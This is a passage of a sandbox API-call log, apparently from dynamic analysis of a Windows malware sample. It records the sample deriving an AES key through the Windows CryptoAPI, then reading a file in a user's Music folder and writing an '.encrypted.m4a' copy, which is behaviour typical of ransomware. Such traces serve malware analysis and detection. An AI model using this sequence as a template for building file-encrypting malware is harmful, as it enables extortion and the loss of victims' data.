lpMsg=0x6aeb14) returned 0 [0038.212] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.212] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.212] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.212] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0038.212] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.212] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.212] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0038.212] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.212] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.212] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0038.212] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.212] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.212] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0038.212] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.212] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.212] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.212] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.212] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.213] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.213] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.213] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0038.213] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.214] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.214] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0038.214] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.214] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.214] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.214] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.214] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0038.214] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.214] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.214] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.214] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.214] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.214] CryptHashData (hHash=0x7c2240, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0038.214] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.214] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.214] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.214] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.215] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.215] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0038.215] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.215] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.215] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0038.215] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.215] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.215] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.215] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.215] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.215] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.215] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0038.215] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.215] CryptDestroyHash (hHash=0x7c2240) returned 1 [0038.215] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.215] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.215] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.215] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.215] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.215] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lWN8-ZQxM7632S6p.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lwn8-zqxm7632s6p.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0038.216] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.216] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0038.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0038.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0038.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0038.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0038.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0038.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0038.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0038.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0038.216] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0038.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0038.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0038.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0038.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0038.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0038.216] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0038.216] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0038.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0038.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0038.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0038.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0038.217] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0038.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0038.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0038.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0038.217] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0038.217] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0038.217] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0038.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0038.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0038.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0038.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0038.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0038.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0038.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0038.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0038.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0038.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0038.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0038.217] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0038.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0038.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0038.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0038.217] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0038.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0038.218] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0038.218] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0038.218] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0038.218] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0038.218] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0038.218] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0038.218] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0038.218] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.218] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0038.218] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.218] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0038.218] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.218] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0038.218] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0038.218] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music")) returned 0x11 [0038.218] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0038.218] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.218] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0038.218] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0038.218] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0038.218] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.218] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0038.218] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0038.218] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0038.218] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0038.218] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lWN8-ZQxM7632S6p.encrypted.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lwn8-zqxm7632s6p.encrypted.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0038.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0038.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0038.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0038.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0038.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0038.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0038.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0038.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0038.220] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0038.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0038.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0038.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0038.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0038.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0038.220] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0038.220] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0038.220] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0038.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0038.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0038.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0038.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0038.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0038.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0038.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0038.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0038.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0038.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0038.221] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0038.221] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x1ccc, lpOverlapped=0x0) returned 1 [0038.222] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0038.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0038.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0038.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1ccc) returned 0xac0018 [0038.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0038.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0038.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0038.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0038.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0038.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0038.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1ccc) returned 0xac1cf0 [0038.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0038.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.223] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0038.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0038.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0038.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0038.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1ccc) returned 0xac0018 [0038.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0038.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0038.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0038.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.223] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 